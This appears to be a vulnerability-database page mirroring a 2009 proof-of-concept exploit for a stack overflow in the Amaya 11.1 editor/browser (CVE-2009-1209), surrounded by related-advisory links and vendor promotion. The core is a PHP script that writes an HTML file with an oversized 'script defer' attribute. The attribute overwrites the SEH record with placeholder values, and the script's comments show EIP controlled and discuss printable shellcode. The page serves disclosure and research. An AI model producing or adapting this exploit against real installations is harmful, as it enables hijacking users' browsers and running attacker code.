Lucene search
+L

Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow (PoC)

🗓️ 30 Mar 2009 00:00:00Reported by Alfons LujaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 44 Views

Amaya 11.1 W3C Editor/Browser Stack Overflow Proof of Concept (PoC) with code injection vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-1209
30 Mar 200900:00
circl
CVE
CVE-2009-1209
1 Apr 200910:00
cve
Cvelist
CVE-2009-1209
1 Apr 200910:00
cvelist
Exploit DB
Amaya 11.1 - W3C Editor/Browser 'defer' Remote Stack Overflow
30 Mar 200900:00
exploitdb
Exploit DB
Amaya 11.2 - W3C Editor/Browser (defer) Remote Buffer Overflow (SEH)
3 Aug 200900:00
exploitdb
NVD
CVE-2009-1209
1 Apr 200910:30
nvd
Prion
Stack overflow
1 Apr 200910:30
prion
seebug.org
W3C Amaya HTML script标签栈溢出漏洞
2 Apr 200900:00
seebug
UbuntuCve
CVE-2009-1209
1 Apr 200910:30
ubuntucve
<?php

/**//*

     Amaya 11.1 W3C's editor/browser
     Stack Owerflow POC
     Discover by Alfons Luja
     Thx : OiN
     select * from friends --
     This stUff overwrite SEH in my box XP home sp 2
     To correctly overwrite seh you must upload "remote_love.html" to remote server
     Amaya allow only printable shellcode in this case

     EAX:00000000
     ECX:43434343
     EDX:7C9037D8
     EBX:00000000
     ESP:0012DDD0
     EBP:0012DDF0
     ESI:00000000
     EDI:00000000
     EIP:43434343


*//**/

$junk = "\x41";
$n_seh = "\x42\x42\x42\x42";  //pointer to next seh
$h_seh = "\x43\x43\x43\x43";  //seh handler

for($i=1;$i<7000 - (4*19) - 10;$i++){ $junk.="\x41"; }

$junk.=$n_seh;
$junk.=$h_seh;
$hello = "<script defer=\"".$junk."\">";

$hnd = fopen("remote_love.html","w");

       if($hnd){

          fputs($hnd,$hello);
          fclose($hnd);
          echo"DONE !!\n";

       } else {

          echo"Kupa !!\n";

       }

?>

# milw0rm.com [2009-03-30]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Mar 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.12369
44